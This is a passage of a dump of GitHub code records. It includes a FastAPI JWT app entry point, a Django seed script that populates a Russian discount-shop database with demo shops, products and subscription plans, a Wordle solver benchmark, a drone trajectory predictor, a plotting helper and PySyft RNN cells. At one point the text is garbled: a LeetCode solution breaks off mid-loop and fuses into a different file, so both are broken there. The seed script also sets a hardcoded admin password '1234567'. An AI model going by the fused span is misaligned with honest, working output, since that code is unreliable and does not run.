fastapi_jwt_auth import AuthJWT\n\nfrom routes.auth.auth_routes import auth_router\nfrom routes.conferences.conference_routes import conference_router\nfrom database.auth.schema import Setting\nfrom database.database import Base, engine\n\n\nBase.metadata.create_all(bind=engine)\n\n\napp = FastAPI()\n\n\ndef custom_openapi():\n if app.openapi_schema:\n return app.openapi_schema\n\n openapi_schema = get_openapi(\n title=\"conference maker\",\n version=\"1.0\",\n description=\"An API for conference making\",\n routes=app.routes,\n )\n\n openapi_schema[\"components\"][\"securitySchemes\"] = {\n \"Bearer Auth\": {\n \"type\": \"apiKey\",\n \"in\": \"header\",\n \"name\": \"Authorization\",\n \"description\": \"Enter: **'Bearer <JWT>'**, where JWT is the access token\"\n }\n }\n\n # Get all routes where jwt_optional() or jwt_required\n api_router = [route for route in app.routes if isinstance(route, APIRoute)]\n\n for route in api_router:\n path = getattr(route, \"path\")\n endpoint = getattr(route, \"endpoint\")\n methods = [method.lower() for method in getattr(route, \"methods\")]\n\n for method in methods:\n # access_token\n if (\n re.search(\"jwt_required\", inspect.getsource(endpoint)) or\n re.search(\"fresh_jwt_required\", inspect.getsource(endpoint)) or\n re.search(\"jwt_optional\", inspect.getsource(endpoint))\n ):\n openapi_schema[\"paths\"][path][method][\"security\"] = [\n {\n \"Bearer Auth\": []\n }\n ]\n\n app.openapi_schema = openapi_schema\n return app.openapi_schema\n\n\napp.openapi = custom_openapi\n\n\n@AuthJWT.load_config\ndef get_config():\n return Setting()\n\n\napp.include_router(auth_router)\napp.include_router(conference_router)\n","repo_name":"MhmdMhdi10/fastapi_conference_microservice","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"20257248407","text":"#!/usr/bin/env python\nimport os\nimport sys\nfrom django.utils import timezone\nfrom datetime import date\nfrom django.conf import settings\nimport random\n\nif __name__ == \"__main__\":\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"kulik.settings\")\n\n from django.core.management import execute_from_command_line\n\n execute_from_command_line(sys.argv)\n\n\nfrom discount.models import Payment, Shop, Product, User, ProductMail, ModelHistory, ProductType, FilterValue\nfrom discount import models\nfrom discount import tasks\nfrom collections import OrderedDict\nfrom django.db.models import Q\n\nif True:\n\n ProductType.objects.all().delete()\n models.Brand.objects.all().delete()\n FilterValue.objects.all().delete()\n models.SubscriptionType.objects.all().delete()\n models.Shop.objects.all().delete()\n models.Product.objects.all().delete()\n\n\n\n top_parent = models.ProductType()\n top_parent.title = 'Все'\n top_parent.alias = settings.ALIAS_ALL\n top_parent.save()\n\n\n colors_tuple = (\n 'бежевый',\n 'белый',\n 'бирюзовый',\n 'бордовый',\n 'бронзовый',\n 'голубой',\n 'горчичный',\n 'желтый',\n 'зеленый',\n 'золотой',\n 'коралловый',\n 'коричневый',\n 'красный',\n 'молочный',\n 'мультиколор',\n 'оранжевый',\n 'прозрачный',\n 'розовый',\n 'серебряный',\n 'серый',\n 'синий',\n 'фиолетовый',\n 'фуксия',\n 'хаки',\n 'черный'\n )\n\n sizes_man_tuple = (\n 42,\n 44,\n 46,\n 48,\n 50,\n 52,\n 54,\n 56,\n 58,\n 60,\n 62,\n 64,\n 66,\n 68,\n )\n\n sizes_women_tuple= (\n 38,\n 40,\n 42,\n 44,\n 46,\n 48,\n 50,\n 52,\n 54,\n 56,\n 58,\n 60,\n 62,\n 64,\n 66,\n 68,\n )\n\n sizes_childs_tuple = (\n 28,\n 30,\n 33,\n 34,\n 36,\n 37,\n 39,\n 50,\n 53,\n 56,\n 59,\n 62,\n 68,\n 70,\n 71,\n 74,\n 75,\n 80,\n 85,\n 86,\n 90,\n 92,\n 96,\n 98,\n 100,\n 104,\n 110,\n 116,\n 118,\n 120,\n 122,\n 128,\n 126,\n 130,\n 134,\n 137,\n 140,\n 146,\n 147,\n 152,\n 158,\n 164,\n 170,\n 176,\n )\n\n\n sizes_shoes_tuple = (\n 18,\n 19,\n 20,\n 21,\n 22,\n 23,\n 24,\n 25,\n 27,\n 28,\n 29,\n 29.5,\n 30,\n 31,\n 32,\n 32.5,\n 33,\n 33.5,\n 34,\n 34.5,\n 35,\n 35.5,\n 36,\n 36.5,\n 37,\n 37.5,\n 38,\n 39,\n 40,\n 41,\n 42,\n 42.5,\n 43,\n 43.5,\n 44,\n 44.5,\n 45,\n 45.5,\n 46,\n 46.5,\n 47,\n 47.5,\n 48,\n 48.5,\n 49,\n 50.5,\n )\n\n\n\n for elem in colors_tuple:\n FilterValue.objects.create(title=elem, filter_type=models.FILTER_TYPE_COLOR)\n\n\n\n for elem in sizes_childs_tuple:\n FilterValue.objects.create(title=elem, filter_type=models.FILTER_TYPE_SIZE_CHILDS)\n\n for elem in sizes_women_tuple:\n FilterValue.objects.create(title=elem, filter_type=models.FILTER_TYPE_SIZE_WOMAN)\n\n for elem in sizes_man_tuple:\n FilterValue.objects.create(title=elem, filter_type=models.FILTER_TYPE_SIZE_MAN)\n\n for elem in sizes_shoes_tuple:\n FilterValue.objects.create(title=elem, filter_type=models.FILTER_TYPE_SIZE_SHOES)\n\n\n\n with open('categ.csv') as file:\n cats = OrderedDict()\n for line in file:\n line_as_list = line.split(';')\n if line_as_list and line_as_list[0] and line_as_list[0] == 'key':\n continue\n key = int(line_as_list[0])\n cat = {}\n cats[key] = cat\n\n cat['key'] = key\n cat['name'] = line_as_list[1]\n cat['parent'] = line_as_list[6]\n\n\n pt_list=[]\n key_list=[]\n for k in cats:\n cat = cats[k]\n pt = ProductType()\n pt.title = cat['name']\n if cat.get('parent', None):\n parent_elem = cats[int(cat['parent'])]\n parent = ProductType.objects.get(pk=parent_elem['pk'])\n pt.parent = parent\n else:\n pt.parent = top_parent\n print(pt)\n pt.save()\n pt_list.append(pt)\n key_list.append(pt.pk)\n cat['pk'] = pt.pk\n\n\n\n\n pt = models.ProductType.objects.get(level=1, title='Женщинам')\n models.FilterValueToProductType.objects.create(product_type=pt, filter_type=models.FILTER_TYPE_SIZE_WOMAN)\n models.FilterValueToProductType.objects.create(product_type=pt, filter_type=models.FILTER_TYPE_COLOR)\n pt.weight = 1\n pt.alias = settings.ALIAS_WOMEN\n pt.save()\n\n pt = models.ProductType.objects.get(level=1, title='Мужчинам')\n models.FilterValueToProductType.objects.create(product_type=pt, filter_type=models.FILTER_TYPE_SIZE_MAN)\n models.FilterValueToProductType.objects.create(product_type=pt, filter_type=models.FILTER_TYPE_COLOR)\n pt.weight = 2\n pt.alias = settings.ALIAS_MEN\n pt.save()\n\n pt = models.ProductType.objects.get(level=1, title='Детям')\n models.FilterValueToProductType.objects.create(product_type=pt, filter_type=models.FILTER_TYPE_SIZE_CHILDS)\n models.FilterValueToProductType.objects.create(product_type=pt, filter_type=models.FILTER_TYPE_COLOR)\n pt.weight = 3\n pt.alias = settings.ALIAS_CHILDREN\n pt.save()\n\n\n pt = models.ProductType.objects.get(level=1, title='Обувь')\n models.FilterValueToProductType.objects.create(product_type=pt, filter_type=models.FILTER_TYPE_SIZE_SHOES)\n models.FilterValueToProductType.objects.create(product_type=pt, filter_type=models.FILTER_TYPE_COLOR)\n pt.weight = 4\n pt.alias = settings.ALIAS_SHOES\n pt.save()\n\n pt = models.ProductType.objects.get(level=1, title='Аксессуары')\n pt.weight = 5\n pt.alias = settings.ALIAS_ACCESSORIES\n pt.save()\n\n\n pt = models.ProductType.objects.get(level=1, title='Товары для дома')\n pt.weight = 6\n pt.alias = settings.ALIAS_HOME\n pt.save()\n\n pt = models.ProductType.objects.get(level=1, title='Ювелирные изделия')\n pt.weight = 7\n pt.alias = settings.ALIAS_JEWELRY\n pt.save()\n\n pt = models.ProductType.objects.get(level=1, title='Игрушки')\n pt.weight = 8\n pt.alias = settings.ALIAS_TOYS\n pt.save()\n\n pt = models.ProductType.objects.get(level=1, title='Спорт')\n pt.weight = 9\n pt.alias = settings.ALIAS_SPORT\n pt.save()\n\n pt = models.ProductType.objects.get(level=1, title='Красота')\n pt.weight = 10\n pt.alias = settings.ALIAS_BEAUTY\n pt.save()\n\n\n\n\n\n models.SubscriptionType.objects.create(\n title='Экспресс',\n period_points=7,\n max_products= 2,\n price=950,\n period_type=models.SUBSCRIPTION_PERIOD_TYPE_DAY,\n\n )\n\n\n models.SubscriptionType.objects.create(\n title='Эконом',\n period_points=1,\n max_products=5,\n price=3900,\n period_type=models.SUBSCRIPTION_PERIOD_TYPE_MONTH,\n\n )\n\n models.SubscriptionType.objects.create(\n title='Профессионал',\n period_points=1,\n max_products=30,\n price=12900,\n period_type=models.SUBSCRIPTION_PERIOD_TYPE_MONTH,\n\n )\n\n\n models.SubscriptionType.objects.create(\n title='Супер эконом',\n period_points=1,\n max_products=2,\n price=2500,\n period_type=models.SUBSCRIPTION_PERIOD_TYPE_MONTH,\n\n )\n\n models.SubscriptionType.objects.create(\n title='Стандарт',\n period_points=1,\n max_products=10,\n price=6900,\n period_type=models.SUBSCRIPTION_PERIOD_TYPE_MONTH,\n\n )\n\n\n\n\n models.SubscriptionType.objects.create(\n title='Бонусный',\n period_points=5,\n max_products=1,\n price=0,\n period_type=models.SUBSCRIPTION_PERIOD_TYPE_DAY,\n\n )\n\n\n models.SubscriptionType.objects.create(\n title='Пробная-2',\n period_points=15,\n max_products=2,\n price=0,\n period_type=models.SUBSCRIPTION_PERIOD_TYPE_DAY,\n available=False,\n\n )\n\n\n models.SubscriptionType.objects.create(\n title='Пробная-5',\n period_points=15,\n max_products=5,\n price=0,\n period_type=models.SUBSCRIPTION_PERIOD_TYPE_DAY,\n available=False,\n\n )\n\n\nmodels.SubscriptionType.objects.create(\n title='Пробная-10',\n period_points=15,\n max_products=10,\n price=0,\n period_type=models.SUBSCRIPTION_PERIOD_TYPE_DAY,\n available=False,\n\n )\n\n\n\ntry:\n u = models.User.objects.get(username='tatamo')\nexcept:\n u = models.User.objects.create(username='tatamo', email='admin@tatamo.ru', password='1234567')\n\n\ns = models.Shop.objects.create(title='Татамо',\n status=models.SHOP_STATUS_PROJECT,\n image='discount_shop/757v20s7dk0o68j0ft9wl0h0zqgaprj7x71f6f4u79luuox19d.png',\n user=u,\n )\nb = models.Brand.objects.create(title='Татамо')\n\nproduct_images = [\n'discount_product/t4dolelk9yj6sl4cv0v770fdk78guednhmimnn7s44h3dt1gwe.jpg',\n'discount_product/dlbyk6rlus353m6d28duuktnnsc0pymc2nlfeq8jr11wbjgg1m.jpg',\n'discount_product/w57kasjqguf2945ggo5s9h5ov610uw5jw243pn4ncg6ukl7p73.jpg',\n'discount_product/eogoz737c64y6nfzcgudnst3ilpys861y61yne460hx17mect9.jpg',\n'discount_product/renrh6uax66zr9mvcej8wob3ccmrxzz6ezwgodsw45xepv2aa6.jpg',\n]\n\nbanners = [\n'discount_product_banner/7hmtc4fdmr6y7vyf5x5eszbcadb5zuxh0d5y3cv4jrwpr6wgqs.jpg',\n'discount_product_banner/q4m8wddfe7tvivn0zyp9ep2h2ea4lzy7tjgtk3vtmrwzy1ftkq.jpg',\n'discount_product_banner/r0diavzk0vsbu2v6rn1hpz13z672yr2hcoip8rmrva8jn84ode.jpg',\n\n]\n\nmodels.ShopsToUsers.objects.create(shop=s, user=u, confirmed=True)\n\ncategs = models.ProductType.objects.filter(level=1)\nfor categ in categs:\n pt = models.ProductType.objects.filter(has_childs=False).filter(Q(parent=categ) | Q(parent__parent=categ) | Q(parent__parent__parent=categ)).earliest('created')\n\n random.shuffle(product_images)\n for image in product_images:\n product = Product.objects.create(title='Рекламная акция Татамо', body='Рекламная акция Татамо',\n normal_price=100, stock_price=1,\n start_date=models.get_today(),\n end_date=models.get_today() + timezone.timedelta(days=365),\n code='12345', product_type=pt,\n shop=s,\n user=u,\n ad=True,\n brand=b,\n status=models.STATUS_PROJECT,\n compound=''\n )\n models.ProductImage.objects.create(\n product=product,\n image=image,\n weight=1,\n )\nfor banner in banners:\n\n product = Product.objects.create(title='Рекламная акция Татамо', body='Рекламная акция Татамо',\n normal_price=100, stock_price=1,\n start_date=models.get_today(),\n end_date=models.get_today() + timezone.timedelta(days=365),\n code='12345', product_type=pt,\n shop=s,\n user=u,\n ad=True,\n brand=b,\n status=models.STATUS_PROJECT,\n compound=''\n )\n models.ProductBanner.objects.create(product=product, banner=banner, status=models.BANNER_STATUS_APPROVED)\n\n\n\nfrom polls.models import Poll, Answer\n\npoll = Poll.objects.create(question='Как Вы узнали о Татамо?')\n\nAnswer.objects.create(poll=poll, body='Instagram', weight=1)\nAnswer.objects.create(poll=poll, body='Facebook', weight=2)\nAnswer.objects.create(poll=poll, body='Vkontakte', weight=3)\nAnswer.objects.create(poll=poll, body='От друзей', weight=4)\nAnswer.objects.create(poll=poll, body='SMS/EMAIL рассылка', weight=5)\nAnswer.objects.create(poll=poll, body='Статья в интернет или запись в блоге', weight=6)\nAnswer.objects.create(poll=poll, body='Реклама в интернет', weight=7)\nAnswer.objects.create(poll=poll, body='Другое', weight=8)\n\n\nif True:\n #import random\n #************************************\n u = models.User.objects.get(pk=1)\n today = models.get_today()\n\n for i in range(150):\n print('brand', i)\n models.Brand.objects.create(title='Бренд-{0}'.format(i))\n\n brands = models.Brand.objects.all()\n\n for i in range(80):\n print('shop', i)\n s = models.Shop.objects.create(title='Магазин-{0}'.format(i),\n status=models.SHOP_STATUS_PUBLISHED,\n custom_adress='Москва, улица Намоткина, дом 25-а корпус 8 строение 4 офис 234',\n image='discount_shop/n5hpt7yrg7b75165hqwmzqu6xa0kf9qa10h2qojqx284x4wscv.png',\n user=u,\n )\n\n sub_pro = models.SubscriptionType.objects.get(title='Профессионал')\n\n models.Subscription.objects.create(\n shop=s,\n start_date=today,\n end_date=today+timezone.timedelta(days=50),\n subscription_type=sub_pro,\n auto_pay=True,\n user=u,\n )\n models.Payment.increase(s, u, 10000000)\n\n models.ShopsToBrands.objects.create(brand=random.choice(brands), shop=s)\n models.ShopsToBrands.objects.create(brand=random.choice(brands), shop=s)\n models.ShopsToBrands.objects.create(brand=random.choice(brands), shop=s)\n\n models.ShopPhone.objects.create(shop=s, phone='8(123)456-78-90')\n models.ShopPhone.objects.create(shop=s, phone='8(123)456-78-90')\n models.ShopPhone.objects.create(shop=s, phone='8(123)456-78-90')\n\n\n\n pts = models.ProductType.objects.filter(has_childs=False)\n shops = models.Shop.objects.all().exclude(title='Татамо')\n\n\n for i in range(350):\n print('product', i)\n\n normal_price = random.choice(range(200, 20000))\n stock_price = random.choice(range(100, normal_price-20))\n product = Product.objects.create(title='Тестовая акция{0}'.format(i), body='Описание описание описаниеОписание описание описаниеОписание описание описаниеОписание описание описаниеОписание описание описаниеОписание описание описание',\n normal_price=normal_price, stock_price=stock_price,\n start_date=today,\n end_date=today + timezone.timedelta(days=100),\n code='12345', product_type=random.choice(pts),\n shop=random.choice(shops), brand=random.choice(brands),\n user=u,\n status=models.STATUS_PUBLISHED,\n compound='Состав, состав, состав, состав и еще состав, состав. Состав, состав, состав, состав и еще состав, состав.'\n )\n\n\n for filter_param in product.product_type.available_filters:\n k = 0\n max_num = random.choice(range(10))\n filter_values = list(models.FilterValue.objects.filter(filter_type=filter_param))\n random.shuffle(filter_values)\n for filter_value in filter_values:\n k += 1\n product.filter_values.add(filter_value)\n if k >= max_num: break\n\n banner = models.ProductBanner.objects.create(product=product, banner='discount_product_banner/bkkyr6vzv618mg5zg43t86c34siix65pvspaewnyhz59auhb6l.jpg', status=models.BANNER_STATUS_APPROVED)\n banner = models.ProductBanner.objects.create(product=product, banner='discount_product_banner/bkkyr6vzv618mg5zg43t86c34siix65pvspaewnyhz59auhb6l.jpg', status=models.BANNER_STATUS_ON_APPROVE)\n\n action_category = models.ProductAction.objects.create(start=False, start_date=product.start_date,\n end_date=product.end_date,\n action_type=models.ACTION_TYPE_CATEGORY,\n product=product,\n )\n\n action_popular = models.ProductAction.objects.create(start=False, start_date=product.start_date,\n end_date=product.end_date,\n action_type=models.ACTION_TYPE_POPULAR,\n product=product, banner=banner,\n )\n #product.pay()\n\n models.ProductImage.objects.create(\n product=product,\n image='discount_product/aj9hmjhlxltwepken1peenkxh9jbomvsbeyvc0yyyi5x8h50un.jpg',\n weight=random.choice(range(10)),\n )\n\n models.ProductImage.objects.create(\n product=product,\n image='discount_product/0w80ecji8mc7dmkpyotzhnx8y7t640y9pvyqxmhy8is42l2fqo.jpg',\n weight=random.choice(range(10)),\n )\n\n models.ProductImage.objects.create(\n product=product,\n image='discount_product/5gf9yradwz66mdk92xed9ybgoh9mnilzysjvicc1o21mzevuak.jpg',\n weight=3,\n )\n\n models.ProductImage.objects.create(\n product=product,\n image='discount_product/lgbhbw5y3ubwkd0o083noo5ker1vmayat7ifvq1k098043fxcr.jpg',\n weight=random.choice(range(10)),\n )\n\n models.ProductImage.objects.create(\n product=product,\n image='discount_product/wmg7jjnuyd7dkjo2st7tmegtl2n1dlkpq2o2nf9g9nr57es4o3.jpg',\n weight=random.choice(range(10)),\n )\n\n models.ProductImage.objects.create(\n product=product,\n image='discount_product/jv7qxolhjdqlk5swppj7y7frk91bnlefloi5fnuospnzr88s6a.jpg',\n weight=random.choice(range(10)),\n )\n\n models.ProductImage.objects.create(\n product=product,\n image='discount_product/y71e2oa250imfq7yo4q9hk6e40lu2i443oeu0ikuwjjrt4op4n.jpg',\n weight=random.choice(range(10)),\n )\n\n\n\n","repo_name":"poleha/tatamo","sub_path":"first_load.py","file_name":"first_load.py","file_ext":"py","file_size_in_byte":19955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38163141880","text":"#!/usr/bin/env python\n\n\nimport argparse\nimport concurrent.futures\nimport logging\nimport os\nimport random\nimport typing\n\nfrom tqdm import tqdm\n\nimport common\nimport algo1\n\n\nclass Benchmark:\n database: common.Database\n player_class: typing.Type[common.PlayerInterface]\n\n def __init__(self, database, player_class):\n self.database = database\n self.player_class = player_class\n\n def RunOne(self, answer_id):\n engine = common.GameEngine(answer_id, self.database, verbose=False)\n player = self.player_class(self.database)\n try_count = engine.Play(player)\n\n return try_count\n\n def RunBatch(self, batch: typing.List[int]):\n engine = common.GameEngine(-1, self.database, verbose=False)\n player = self.player_class(self.database)\n\n results = []\n for answer_id in batch:\n engine.answer_id = answer_id\n results.append(engine.Play(player))\n return results\n\n\n def RunAll(self, N: int=0, job_count: int=0):\n if N == 0:\n N = self.database.answer_count\n\n if job_count == 0:\n job_count = os.cpu_count() or 16\n\n batch_size = N // job_count\n print(f'start: job_count={job_count}, N={N}, batch_size={batch_size}')\n\n with concurrent.futures.ProcessPoolExecutor(\n max_workers=job_count) as executor:\n futures = {}\n\n answer_ids = random.sample(range(self.database.answer_count), N)\n\n for start in range(0, len(answer_ids), batch_size):\n batch = answer_ids[start:(start + batch_size)]\n future = executor.submit(self.RunBatch, batch)\n futures[future] = batch\n\n tqdm_kwargs = {\n 'total': len(futures),\n 'unit': 'ans',\n 'unit_scale': True,\n 'leave': True\n }\n\n accumulated_value = 0\n try_count_to_words = [[] for _ in range(10)]\n\n for future in tqdm(concurrent.futures.as_completed(futures),\n **tqdm_kwargs):\n batch = futures[future]\n try:\n results = future.result()\n except Exception:\n logging.exception('failed to process %s', batch)\n else:\n for answer_id, try_count in zip(batch, results):\n accumulated_value += try_count\n try_count_to_words[try_count].append(answer_id)\n\n print(f'average: {accumulated_value / N}')\n for try_count, answers in enumerate(try_count_to_words):\n if not answers:\n continue\n words = [self.database.guesses[word_id] for word_id in answers[:10]]\n print(f'{try_count}: {len(answers)} ==> {words}')\n\n\ndef Main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-N', type=int, default=0)\n parser.add_argument('--jobs', type=int, default=0)\n\n args = parser.parse_args()\n\n database = common.LoadData()\n benchmark = Benchmark(database, algo1.Player)\n\n benchmark.RunAll(args.N, args.jobs)\n\n\nif __name__ == '__main__':\n Main()\n","repo_name":"Stimim/Wordle","sub_path":"benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40285559947","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 18 23:07:42 2017\n\n@author: Administrator\n\"\"\"\n\nclass Solution(object):\n def findContentChildren(self, g, s):\n \"\"\"\n :type g: List[int]\n :type s: List[int]\n :rtype: int\n \"\"\"\n g.sort()\n s.sort()\n k = i = 0\n while(i 1:\n self.input_data[\"others_input\"] = np.zeros((self.n_robots, self.past_horizon, 6, self.n_robots-1))\n else:\n args.others_input_type = \"none\"\n if self.n_obstacles > 0:\n self.input_data[\"obstacles_input\"] = np.zeros((self.n_robots, 6, self.n_obstacles))\n else:\n args.obstacles_input_type = \"none\"\n\n self.model = model_selector(args)\n self.model.call(self.input_data)\n self.model.load_weights(checkpoint_path)\n \n if self.model.stateful:\n for i in range(len(self.model.layers)):\n self.model.layers[i].stateful = False\n \n def predict(self, robot_data, obstacle_data):\n \n for query_quad_idx in range(self.n_robots):\n other_quad_idxs = [idx for idx in range(self.n_robots) if idx != query_quad_idx]\n \n self.input_data[\"query_input\"][query_quad_idx] = np.transpose( robot_data[3:6, : , query_quad_idx] )\n \n if self.n_robots > 1:\n self.input_data[\"others_input\"][query_quad_idx] = np.moveaxis( robot_data[0:6, : , other_quad_idxs] - robot_data[0:6, :, query_quad_idx:query_quad_idx+1], 0, 1)\n \n if self.n_obstacles > 0:\n self.input_data[\"obstacles_input\"][query_quad_idx] = obstacle_data - robot_data[0:6, -1, query_quad_idx:query_quad_idx+1]\n \n scaled_data = self.scaler.transform(self.input_data)\n \n scaled_data[\"target\"] = self.model.predict(scaled_data)\n vel_prediction = self.scaler.inverse_transform(scaled_data)[\"target\"]\n \n pos_prediction = np.zeros((self.n_robots, self.prediction_horizon+1, 3))\n pos_prediction[:, 0, :] = np.transpose(robot_data[0:3, -1 , :])\n for step in range(1, self.prediction_horizon+1):\n pos_prediction[:, step, :] = pos_prediction[:, step-1, :] + self.dt * vel_prediction[:, step-1, :]\n \n return np.swapaxes(pos_prediction[:, 1:, :], 0, -1)\n \n \n \n \n\n\n\n","repo_name":"FMartinezClaramunt/drone_prediction_network2","sub_path":"src/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"31256238635","text":"import matplotlib.pyplot as plt\n\n\ndef graph(formula, x_range, x_label, y_label, name):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(x_range, [formula(value) for value in x_range])\n plt.grid(True)\n ax.set_xlabel(x_label)\n ax.set_ylabel(y_label)\n plt.savefig(\"%s.png\" % name)\n","repo_name":"imscaradh/optimisationmethods","sub_path":"functionhelper/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24550515179","text":"import numpy as np\nimport torch\nfrom torch import nn\nfrom torch.nn import init\n\n\nfrom syft.frameworks.torch.tensors.interpreters.additive_shared import AdditiveSharingTensor\nfrom syft.frameworks.torch.tensors.interpreters import precision\nfrom syft.generic.pointers.pointer_tensor import PointerTensor\n\n\nclass RNNCellBase(nn.Module):\n \"\"\"\n Cell to be used as base for all RNN cells, including GRU and LSTM\n This class overrides the torch.nn.RNNCellBase\n Only Linear and Dropout layers are used to be able to use MPC\n \"\"\"\n\n def __init__(self, input_size, hidden_size, bias, num_chunks, nonlinearity=None):\n super(RNNCellBase, self).__init__()\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.bias = bias\n self.num_chunks = num_chunks\n self.nonlinearity = nonlinearity\n self.fc_xh = nn.Linear(input_size, self.num_chunks * hidden_size, bias=bias)\n self.fc_hh = nn.Linear(hidden_size, self.num_chunks * hidden_size, bias=bias)\n self.reset_parameters()\n\n def reset_parameters(self):\n \"\"\"\n This method initializes or reset all the parameters of the cell.\n The paramaters are initiated following a uniform distribution.\n \"\"\"\n std = 1.0 / np.sqrt(self.hidden_size)\n for w in self.parameters():\n init.uniform_(w, -std, std)\n\n def init_hidden(self, input):\n \"\"\"\n This method initializes a hidden state when no hidden state is provided\n in the forward method. It creates a hidden state with zero values.\n \"\"\"\n h = torch.zeros(input.shape[0], self.hidden_size, dtype=input.dtype, device=input.device)\n if input.has_child() and isinstance(input.child, PointerTensor):\n h = h.send(input.child.location)\n if input.has_child() and isinstance(input.child, precision.FixedPrecisionTensor):\n h = h.fix_precision()\n child = input.child\n if isinstance(child.child, AdditiveSharingTensor):\n crypto_provider = child.child.crypto_provider\n owners = child.child.locations\n h = h.share(*owners, crypto_provider=crypto_provider)\n return h\n\n\nclass RNNCell(RNNCellBase):\n \"\"\"\n Python implementation of RNNCell with tanh or relu non-linearity for MPC\n This class overrides the torch.nn.RNNCell\n \"\"\"\n\n def __init__(self, input_size, hidden_size, bias=True, nonlinearity=\"tanh\"):\n super(RNNCell, self).__init__(input_size, hidden_size, bias, num_chunks=1)\n\n if nonlinearity == \"tanh\":\n self.nonlinearity = torch.tanh\n elif nonlinearity == \"relu\":\n self.nonlinearity = torch.relu\n else:\n raise ValueError(f\"Unknown nonlinearity: {nonlinearity}\")\n\n def forward(self, x, h=None):\n\n if h is None:\n h = self.init_hidden(x)\n h_ = self.nonlinearity(self.fc_xh(x) + self.fc_hh(h))\n\n return h_\n\n\nclass GRUCell(RNNCellBase):\n \"\"\"\n Python implementation of GRUCell for MPC\n This class overrides the torch.nn.GRUCell\n \"\"\"\n\n def __init__(self, input_size, hidden_size, bias=True, nonlinearity=None):\n super(GRUCell, self).__init__(input_size, hidden_size, bias, num_chunks=3)\n\n def forward(self, x, h=None):\n\n if h is None:\n h = self.init_hidden(x)\n\n gate_x = self.fc_xh(x)\n gate_h = self.fc_hh(h)\n x_r, x_z, x_n = gate_x.chunk(self.num_chunks, 1)\n h_r, h_z, h_n = gate_h.chunk(self.num_chunks, 1)\n\n resetgate = torch.sigmoid(x_r + h_r)\n updategate = torch.sigmoid(x_z + h_z)\n newgate = torch.tanh(x_n + (resetgate * h_n))\n\n h_ = newgate + updategate * (h - newgate)\n\n return h_\n\n\nclass LSTMCell(RNNCellBase):\n \"\"\"\n Python implementation of LSTMCell for MPC\n This class overrides the torch.nn.LSTMCell\n \"\"\"\n\n def __init__(self, input_size, hidden_size, bias=True, nonlinearity=None):\n super(LSTMCell, self).__init__(input_size, hidden_size, bias, num_chunks=4)\n\n def reset_parameters(self):\n super(LSTMCell, self).reset_parameters()\n\n # Bias of forget gate should be initialize with 1 or 2\n # Ref: http://proceedings.mlr.press/v37/jozefowicz15.pdf\n incr_bias = 1.0 / self.hidden_size\n init.constant_(self.fc_xh.bias[self.hidden_size : 2 * self.hidden_size], incr_bias)\n init.constant_(self.fc_hh.bias[self.hidden_size : 2 * self.hidden_size], incr_bias)\n\n def forward(self, x, hc=None):\n\n if hc is None:\n hc = (self.init_hidden(x), self.init_hidden(x))\n h, c = hc\n\n gate_x = self.fc_xh(x)\n gate_h = self.fc_hh(h)\n\n x_i, x_f, x_c, x_o = gate_x.chunk(self.num_chunks, 1)\n h_i, h_f, h_c, h_o = gate_h.chunk(self.num_chunks, 1)\n\n inputgate = torch.sigmoid(x_i + h_i)\n forgetgate = torch.sigmoid(x_f + h_f)\n cellgate = torch.tanh(x_c + h_c)\n outputgate = torch.sigmoid(x_o + h_o)\n\n c_ = torch.mul(forgetgate, c) + torch.mul(inputgate, cellgate)\n\n h_ = torch.mul(outputgate, torch.tanh(c_))\n\n return h_, c_\n\n\nclass RNNBase(nn.Module):\n \"\"\"\n Module to be used as base for all RNN modules, including GRU and LSTM\n This class overrides the torch.nn.RNNBase\n Only Linear and Dropout layers are used to be able to use MPC\n \"\"\"\n\n def __init__(\n self,\n input_size,\n hidden_size,\n num_layers,\n bias,\n batch_first,\n dropout,\n bidirectional,\n base_cell,\n nonlinearity=None,\n ):\n super(RNNBase, self).__init__()\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.num_layers = num_layers\n self.bias = bias\n self.batch_first = batch_first\n self.dropout = float(dropout)\n self.bidirectional = bidirectional\n self.num_directions = 2 if bidirectional else 1\n self.is_lstm = base_cell is LSTMCell\n self.nonlinearity = nonlinearity\n\n # Dropout layers\n # TODO: implement a nn.Dropout class for PySyft\n # Link to issue: https://github.com/OpenMined/PySyft/issues/2500\n\n # Build RNN forward layers\n sizes = [input_size, *(hidden_size for _ in range(self.num_layers - 1))]\n self.rnn_forward = nn.ModuleList(\n (base_cell(sz, hidden_size, bias, nonlinearity) for sz in sizes)\n )\n\n # Build RNN backward layers, if needed\n if self.bidirectional:\n self.rnn_backward = nn.ModuleList(\n (base_cell(sz, hidden_size, bias, nonlinearity) for sz in sizes)\n )\n\n def forward(self, x, hc=None): # noqa: C901\n # If batch_first == True, swap batch with seq_len\n # At the end of the procedure we swap it back to the original structure\n if self.batch_first:\n x = x.transpose(0, 1)\n\n # If hc is not None, hc is either a Tensor (RNNCell or GRUCell hidden state),\n # or a 2-tuple of Tensors (LSTMCell hidden and cell states).\n # For convenience, we make hc always listy so that:\n # hc[0] is the hidden state\n # hc[1] if it exists, is the cell state\n # At the end of the procedure, we swap it back to the original structure\n if hc is None:\n # Initialize hc\n hc = [self._init_hidden(x) for _ in range(2 if self.is_lstm else 1)]\n else:\n # Standardize hc per comment above\n if not self.is_lstm:\n hc = [hc]\n\n # As we did to x above, we swap back at the end of the procedure\n if self.batch_first:\n hc = [item.transpose(0, 1) for item in hc]\n\n batch_size = x.shape[1]\n seq_len = x.shape[0]\n\n # If bidirectional==True, split states in two, one for each direction\n if self.bidirectional:\n hc = [\n 